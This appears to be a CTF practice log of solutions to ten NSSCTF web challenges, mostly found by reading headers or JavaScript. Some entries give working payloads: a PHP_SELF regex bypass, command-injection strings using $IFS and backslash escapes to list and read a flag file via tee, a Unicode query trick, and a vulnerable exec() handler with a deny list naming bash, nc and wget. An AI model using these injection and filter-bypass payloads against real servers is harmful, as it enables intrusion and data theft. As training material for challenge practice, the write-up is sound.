NSSCTF Web challenge practice log [12]
- [NCTF 2018] Check-in questions:
- [Crane City Cup 2021] EasyP:
- [NSSCTF 2022 Spring Recruit]ezgame:
- [GXYCTF 2019]Ping Ping Ping:
- [SWPUCTF 2021 Freshman Competition] finalrce:
- [NISACTF 2022]checkin:
- [UUCTF 2022 Freshman Competition] websign:
- [GDOUCTF 2023]hate eat snake:
- [HNCTF 2022 Week1]2048:
- [HDCTF 2023]Welcome To HDCTF 2023:
NSSCTF platform: https://www.nssctf.cn/
PS: Remember to change every flag to the NSSCTF format.
[NCTF 2018] Check-in questions:
The challenge opens on search.php. I looked at the source code but couldn't find the flag there. Finally, I found it in the response header of index.php!
NSSCTF{w3lc0m3_t0_nctf2018hhhhhhhhhhhh}
[Crane City Cup 2021] EasyP:
<?php
include 'utils.php';
if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}
if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}
if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
    exit("hacker :)");
}
if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}else{
    show_source(__FILE__);
}
?>
Analyzing the code:
$_SERVER['PHP_SELF']: the path of the script being called.
$_SERVER['REQUEST_URI']: the current URI, that is, the complete address path after the domain name.
basename(): returns the file name part of a path.
First we need to bypass preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF']). The regex is bypassed as long as a non-ASCII character, for example a Chinese character, is added after utils.php/.
show_source cannot be passed directly because of the second preg_match, so change show_source to show[source to get past that check.
So add a character that is not in the ASCII table after index.php/utils.php/ (many characters work).
payload:/index.php/utils.php/巧克力?show[source=1
NSSCTF{9ce4af3e-811f-49cd-a8f3-544efa897fb9}
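The mismatch behind this solution, next to a stricter handler, as an added example that is not the challenge's code or part of the original write-up: both guards inspect the raw request strings, while PHP acts on the parsed values. The function names, the constructed request values and the rule that only index.php may be displayed are assumptions.

```php
<?php
// Added example with constructed values; not the challenge's code.

// The two guards from the challenge, applied to the raw request strings.
function original_guards_block(string $phpSelf, string $requestUri): bool
{
    return preg_match('/utils\.php\/*$/i', $phpSelf) === 1
        || preg_match('/show_source/', $requestUri) === 1;
}

// The parameter names PHP would expose in $_GET for this request.
// parse_str() applies the same name mangling as $_GET: an unmatched "["
// in a parameter name is turned into "_".
function parsed_get_keys(string $requestUri): array
{
    $query = (string) parse_url($requestUri, PHP_URL_QUERY);
    parse_str($query, $params);
    return array_keys($params);
}

// Hardened selection (assumption: only index.php may ever be displayed).
// SCRIPT_NAME does not include PATH_INFO, unlike PHP_SELF, and the final
// name is checked against an allowlist after all parsing is done.
function hardened_target(string $scriptName, array $get): ?string
{
    if (!array_key_exists('show_source', $get)) {
        return null;
    }
    $name = basename($scriptName);
    return in_array($name, ['index.php'], true) ? $name : null;
}

// Constructed request matching the payload discussed above.
$phpSelf    = '/index.php/utils.php/巧克力';
$scriptName = '/index.php';
$requestUri = $phpSelf . '?show[source=1';

// Raw-string guards versus the keys PHP actually parses from the same URI.
var_dump(original_guards_block($phpSelf, $requestUri));
var_dump(parsed_get_keys($requestUri));

// The hardened handler ignores PATH_INFO and works on the parsed array.
var_dump(hardened_target($scriptName, ['show_source' => '1']));
```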
[NSSCTF 2022 Spring Recruit]ezgame:
Scoring 65 points in the game gives you the flag (too lazy to play), so let's look through the JS instead. The FLAG is in js/preload.js.
NSSCTF{c0700f5b-604f-4b8f-b017-4be822fb5de6}
[GXYCTF 2019]Ping Ping Ping:
This challenge has been covered before; see: https://blog.csdn.net/Aluxian_/article/details/130053100?spm=1001.2014.3001.5501
Payload:?ip=127.0.0.1;cat$IFS$9`ls`
NSSCTF{8117affa-f16d-4085-b644-696ae9b83a2c}
[SWPUCTF 2021 Freshman Competition] finalrce:
<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
}
preg_match performs a regular expression match. Here a large number of commands are filtered, so cat and ls cannot be used directly. The tee command can be used instead.
Since ls is caught by the regular expression, preg_match also has to be bypassed with the escape character, a backslash (\).
tee reads from standard input, then writes to standard output and to files.
Payload: ?url=l\s / |tee 1.txt
Then access 1.txt to see flllllaaaaaaggggggg.
tac is not filtered, so the next payload can be constructed directly.
Payload: ?url=tac /flllll\aaaaaaggggggg | tee 9.txt
(Remember the space after |.) Then access 9.txt.
NSSCTF{9dccd221-4cd1-41f7-9feb-3c463839eb88}
[NISACTF 2022]checkin:
Tip: Try copying the source code and viewing it in 010 Editor.
This reveals the special Unicode characters. Copy them into VS Code, then copy them out and URL-encode them.
Payload:?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF
NSSCTF{5359287b-d34e-4df8-ac95-1670f011cf2c}
[UUCTF 2022 Freshman Competition] websign:
[GDOUCTF 2023]hate eat snake:
Clear the game to get the flag, or first "G" (game over) a few times, then click cancel, wait for about 60 seconds, and press the space bar to get the flag.
[HNCTF 2022 Week1]2048:
It's a classic game. Press F12 to view the source, find the JS file, open it and look at what alert() outputs, then copy that to the console and run it.
NSSCTF{53160c888e25c3f828b23e316a7ae083}
[HDCTF 2023]Welcome To HDCTF 2023:
If you play the game normally it will give you the FLAG. Alternatively, go to the JS, find the JSFuck-encoded string and decode it.
NSSCTF{We13ome_t@_HDCTF_2o23}